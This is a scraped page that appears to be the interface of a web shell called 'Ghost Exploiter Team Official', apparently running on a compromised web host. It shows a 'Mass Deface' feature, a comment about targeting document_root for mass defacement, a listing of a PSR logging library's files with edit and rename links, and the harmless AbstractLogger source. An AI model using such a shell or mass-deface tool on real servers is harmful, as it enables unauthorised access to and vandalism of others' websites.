webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
psr
/
log
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
AbstractLogger.php
0.404KB
edt
ren
InvalidArgumentExceptio
...
0.094KB
edt
ren
LogLevel.php
0.328KB
edt
ren
LoggerAwareInterface.php
0.296KB
edt
ren
LoggerAwareTrait.php
0.422KB
edt
ren
LoggerInterface.php
3.313KB
edt
ren
LoggerTrait.php
3.616KB
edt
ren
NullLogger.php
0.721KB
edt
ren
<?php namespace Psr\Log; /** * This is a simple Logger implementation that other Loggers can inherit from. * * It simply delegates all log-level-specific methods to the `log` method to * reduce boilerplate code that a simple Logger that does the same thing with * messages regardless of the error level has to implement. */ abstract class AbstractLogger implements LoggerInterface { use LoggerTrait; }